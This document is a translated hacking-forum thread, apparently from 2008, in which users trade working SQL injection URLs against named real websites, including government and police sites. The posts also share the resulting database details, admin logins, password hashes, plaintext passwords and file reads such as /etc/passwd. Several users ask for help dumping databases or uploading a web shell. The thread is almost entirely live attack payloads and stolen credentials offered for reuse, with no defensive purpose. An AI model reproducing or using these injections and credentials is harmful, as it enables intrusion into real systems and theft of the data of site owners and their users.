SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. beerhack

    beerhack Elder
    http://www.belanovsky.ru/links/ind.php?id_typ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,customerID,Login,cust_password,Email,first_name,last_name,subscribed4news,custgroupID,addressID,reg_datetime,ActivationCode,CID),8,9,10,11,12,13,14,15+from+SS_customers/*

    USER: [email protected]:
    VERSION: 5.0.45-log:
    DATABASE: u55631


    1:admin:d2luZG93c21vYmlsZQ==:[email protected]:::1:0:0:2007-03-01 16:26:01::3
     
    #5061 beerhack, 15 Mar 2008
    Last edited: 15 Mar 2008
  2. Kakoytoxaker

    Kakoytoxaker Elder
    2 ThreeD
    I doubt that this can be used as a login :D
    Here are the columns from the admin table:
    UID
    DEPARTMENT
    DEPARTMENT_UID
    ID
    PWD
    NAME
    SEX
    MOBILE
    EMAIL
    PRIVILEGE
    LAST_LOGIN
    LAST_CHPWD

    I didn't look for the admin panel, but I think they don't use a name in Japanese for authentication :D
     
  3. ThreeD

    ThreeD Banned
    To stay on topic:
    http://www.attcottonbowl.com/news_room/releases.php?uid=-160'+union+select+1,2,3,4,5,concat_ws(0x3A3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16+from+user/*

    4.1.20::cottonbowl::cottonbowl@localhost

    I couldn't work out the fields in the user table (
     
  4. CaNNabi$

    CaNNabi$ Elder
    Code:
    http://mirfurniture.ru/ind.php?id_typ=0x3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
    5.0.33-log/dmebel6/root@localhost

    Code:
    http://www.9528033.ru/board/ind.php?id_typ=0x2d3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
    4.1.22/www9528033ru/f9528033@localhost

    Code:
    http://neodoska.ru/ind.php?id_categ=0x2d3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20/*
    5.0.45-community/angelos_doska/angelos@localhost


    Ready-made ones :rolleyes: there are thousands more of them on GOOGLE =)

    REPOST, come on, are you too lazy to check ANTIBOYAN ???!!!!
     
  5. ZET36

    ZET36 Elder
    Code:
    http://www.dok-4.ru/?id=-9+union+select+1,user(),3,4,5,version()/*
    
     
  6. neon_fx

    neon_fx Elder
    So today I decided to go through besthosting.in.ua
    Well, here's the result
    There's all sorts here,
    both shops and info services


    whoever wants to can look for themselves
     
    #5066 neon_fx, 16 Mar 2008
    Last edited: 16 Mar 2008
  7. Joker-jar

    Joker-jar Elder
    Code:
    http://www.worldstart.com/tips/tips.php/1862/**/and/**/ascii(lower(substring(version(),1,1)))=0x33/*
    A three :((( brutal
     
  8. CaNNabi$

    CaNNabi$ Elder
    Who wants some govHA?)
    http://www.dot.ca.gov
    Code:
    [B]http://www.dot.ca.gov/dist07/travel/projects/?pib=det&id=0x2d3127%20union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,version(),database(),user()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*[/B]
    4.0.18-standard-log/d7mediapr/[email protected]
     
  9. CaNNabi$

    CaNNabi$ Elder
    I've brought you some govHA again =)
    http://prairieviewtexas.gov
    Code:
    [B]http://prairieviewtexas.gov/Page.php?id=-1'%20union+select+1,2,3,4,5,6,7/*[/B]
    5.0.45-community-nt/cpv/cpv@localhost


    http://kostanaypolice.kz/ well, this one is really something) Ministry of Internal Affairs of the Republic of Kazakhstan
    Code:
    [B][COLOR=Red]http://kostanaypolice.kz/index.php?id=0x2d3127)%20union+select+1,2,concat_ws(0x2F,version(),database(),user())/*[/COLOR][/B]
    4.1.22-log/t314kz_dvd/t314kz_dvduser@localhost


    That's it, they've come for me :(
    Don't forget me :D
     
  10. neon_fx

    neon_fx Elder
    http://www.fdh.com/news/show.php?id=-52+union+select+1,concat_ws(char(58),user,password),3,4,5+from+mysql.user+limit+0,10/*
    fdhllp:4ee995d07a241a7b

    http://www.falltvpreview.com/show.php?id=-134+union+select+1,2,3,4,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+INFORMATION_SCHEMA.COLUMNS+limit+1--

    And a question: what query should I write to create a DB dump on falltvpreview.com
    and in the first case too

    http://www.airsoftgun.ee/rus/show.php?object=news&mode=full&id=-120+union+select+1,user(),3,Version(),5,6,7+from+INFORMATION_SCHEMA.COLUMNS+limit+1/*

    [email protected]
    5.0.32-Debian_7etch1-log
     
    #5070 neon_fx, 16 Mar 2008
    Last edited: 16 Mar 2008
  11. gibson

    gibson Elder
    howtostudy.org
    4.1.20:tribble@localhost:howtostudy

    rabota.md
    5.0.45:coruptie@localhost:coruptie_rabota
    videology.ru
    5.0.22:videologyr_777@localhost:videologyr_777

    alex:f1c1592588411002af340cbaedd6fc33:7 pass:777 mailto:[email protected]
    nickdemidov:381987d375be5b533fc11198005ab02d:0

    eurekaeurope.com
    4.0.27:[email protected]:nigor

    dumpfile
     
  12. nex0

    nex0 Elder
    zhuk.net
    Code:
    http://www.zhuk.net/archive/printyk.asp?aid=2973+or+1=@@version--
    version Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
    db_name() rcb
    system_user rcb
    Code:
    http://www.zhuk.net/archive/printyk.asp?aid=2973+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
    At first I pulled the tables out of information_schema.tables by hand, but then their number started to get annoying... so I used Elekt's dumper
    The Users table is interesting
    Code:
    http://www.zhuk.net/archive/printyk.asp?aid=2973+or+1=(SELECT+TOP+1+cast(idus+as+nvarchar)%2B%27%3A%27%2Bcast(UID+as+nvarchar)%2B%27%3A%27%2Bcast(PW+as+nvarchar)+FROM+USERS+WHERE+idus=1)--
    Code:
    1:admin:p3OK_+
    2:sub:2WEdd&
    Code:
    http://www.zhuk.net/adminka.php
    Must be the admin panel, but it's no use, since it returns 403

    sdigital.ru
    Code:
    http://www.sdigital.ru/view_product.asp?idProduct=3196&idCategory=14&idSubCategory=81+or+1=@@version--
    version Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    db_name() u93901
    system_user u93901
    there are tables
    Code:
           News
           Meta
           Pages
           Products
           SubCategories
           UsualCarts
           SupProducts
           Clients
           Admin
           Categories
           Brands
           Currencies
    interesting table: Admin
    columns login and pass
    Code:
    http://www.sdigital.ru/view_product.asp?idProduct=3196&idCategory=14&idSubCategory=81+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(pass+as+nvarchar)+FROM+Admin)--
    There is only one user there, namely
    Code:
    admin:gbpltw
    admin panel
    Code:
    sdigital.ru/admin
    highrollerbonuses.com
    Code:
    http://www.highrollerbonuses.com/high_roller_casino.php?casid=900+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
    version() 4.0.24_Debian-10sarge3-log
    user() junior@localhost
    database() junior

    casinogenie.co.uk
    Code:
    http://www.casinogenie.co.uk/casino_review.php?casinoid=9999+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
    version() 5.0.24a-Debian_1-log
    user() root@localhost :)
    database() casinogenie

    interesting tables
    Code:
    access_types
    admins
         admin_id
         username
         passwd
         realname
         email
         is_active
    campaigns
    clients
    suppliers
    adminlogin
    blog_author
    
    novinkisezona.ru
    Code:
    http://www.novinkisezona.ru/show_cat2.php?grid=-20+union+select+concat(version(),0x3a,user(),0x3a,database())
    version() 4.1.20-lk-log
    user() novinkisez@localhost
    database() novinkisez

    nycpov.com
    Code:
    http://www.nycpov.com/vr_viewer.php?vrid=-5+union+select+1,convert(concat(version(),0x3a,user(),0x3a,database()),binary),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
    version() 4.1.16-standard-log
    user() [email protected]
    database() nycpano

    superdyke.com
    Code:
    http://www.superdyke.com/venueprofileview.php?ghid=-38+union+select+1,2,3,4,5,6,7,concat(version(),0x3a,user(),0x3a,database()),9/*
    version() 4.0.27-standard-log
    user() super_super@localhost
    database() super_superdyke


    dekalaser.ru

    Code:
    http://dekalaser.ru/products/index.php?prid=-9+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8
    version() 5.0.45-log
    user() [email protected]
    database() u19010

    galant-fasad.com.ua
    Code:
    http://galant-fasad.com.ua/content.php?prID=1'
    version() 4.0.27-max-log
    user() [email protected]
    database() trialog3

    planeta-sos.com
    Code:
    http://www.planeta-sos.com/goods.php?prid=999&rid=1+union+select+1,concat(version(),0x3a,user(),0x3a,database())
    version() 4.1.21-log
    user() [email protected]
    database() planetasoscom_ssr

    posterdb.de
    Code:
    http://www.posterdb.de/detailmovie.php?filmID=-366+union+select+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9/*
    version() 5.0.22
    user() web207@localhost
    database() usr_web207_1
    interesting tables
    Code:
    person
    posteruser
    outgroup_members
    uni-cis.ru
    Code:
    http://www.uni-cis.ru/news2.php?nid=-358+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4
    version() 4.0.23-standard
    user() unicis_user@localhost
    database() unicis_database
     
  13. Sharingan

    Sharingan Elder
    Code:
    http://www.electroportal.net/vis_directory.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(version(),0x3a,user(),0x3a,database()),10,11,12,13,14/*
    5.0.32-enterprise-gpl-nt:electroportal@localhost:electroportal subdirectory
    The site is completely screwed up, with table names three words long =\

    some little Italian shop
    Code:
    http://www.allemandi.com/dett_libri.php?id=-183+union+select+1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*
    6.0.2-alpha-community-nt-debug o_O did I miss the release of a new version .. ?

    Code:
    http://www.extenzilla.it/scheda_estensione.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
    5.0.24a-standard-log
    there is a table smf_members, I didn't look any further

    Code:
    http://www.mpa-italia.it/press.php?id=-7+UNION+SELECT+1,2,3,4,5,6,7,8,9,version()/*
    5.0.45 there is a table letterit_user
    but for some reason the query
    Code:
    http://www.mpa-italia.it/press.php?id=-7+UNION+SELECT+1,2,3,4,5,6,7,8,9,table_schema+from+information_schema.tables+where+table_name=0x276C657474657269745F7573657227+limit+1,1/*
    returns nothing, no idea why.
     
  14. ZET36

    ZET36 Elder
    porn site
    http://www.largethumb.com/category.php?cat=qwert
    will you help me work it out?
     
  15. Kakoytoxaker

    Kakoytoxaker Elder
    A couple of web design studios.

    Give them your money :D

    ---------------------------------
    Personal site of "Agarev Sergey", a freelancer apparently

    _http://www.agarev.com/website.php?id=99999999+and+1=2+union+select+1,concat(user(),char(58),version(),char(58),database()),3,4/*

    factorho_agarev@localhost:5.0.45-community:factorho_dbagarev

    _http://www.agarev.com/website.php?id=99999999+and+1=2+union+select+1,2,concat(lgn,0x3a,pswd),4+from+agrv_user/*

    agrv_admin:580c1c296bdae1e2
    ---------------------------------------
    «Vitrum-Media», St. Petersburg

    _http://www.vitrum-media.ru/index.php?menu=49&iddoc=104+and+substring(version(),1,1)=4

    no output, subqueries
     
  16. gibson

    gibson Elder
    pixheaven.net

    sansihotels.com
    5.0.22-Debian_0ubuntu6.06.6-log:sansihotels

    columnists.com
    5.0.45-community:nsncsu2_members@localhost:nsncsu2_columnists

    members
    members_new
     
  17. beerhack

    beerhack Elder
    http://www.pconsult.dp.ua/index.php?pn=-99999+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5/*

    USER: pconsult_user@localhost
    VERSION: 4.1.21-standard-log
    DATABASE: pconsult_db


    Never did find the tables :(
    Whoever finds them, post here.
     
  18. Dima-k17

    Dima-k17 Elder
    www.getethical.com
    Code:
    http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,version(),3,4,5/*
    Access to mysql.user
    Code:
    http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,concat_ws(0x3a,user,password,host),3,4,5+from+mysql.user/*
    - Root has no password, but connections are allowed only from localhost. There is, however, a user: leith:663ebe8f58ee1b6c:% (from anywhere), but given the desire to upload a shell, that's not interesting :)
    file_priv=Y
    Code:
    http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,file_priv,3,4,5+from+mysql.user+where+user=left(user(),locate(0x40,user())-1)/*
    /etc/passwd
    Code:
    http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,load_file('/etc/passwd'),3,4,5/*
    And quotes are not escaped =) looks like one could try to upload a shell.
    httpd.conf
    Code:
    http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3,4,5+from+mysql.user/*
    However, the folder /var/www/getethical/public_html/ was not found (((( Maybe someone can suggest where to look up the full path to the site?
    And finally, there is an interesting table: customers
     
    #5078 Dima-k17, 17 Mar 2008
    Last edited: 17 Mar 2008
  19. Kakoytoxaker

    Kakoytoxaker Elder
    Dima-k17
    all well and good, but this is a repost
    _http://forum.antichat.ru/showpost.php?p=287675&postcount=501
     
  20. Dima-k17

    Dima-k17 Elder
    Sorry, I looked here, didn't find it, so I posted it:
    http://filefront.jino-net.ru/sql.html
    However, his is without file_priv :)
    making up for it:
    Code:
    http://adena.ru/keys.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,table_name,22+from+information_schema.tables+limit+0,1/*
     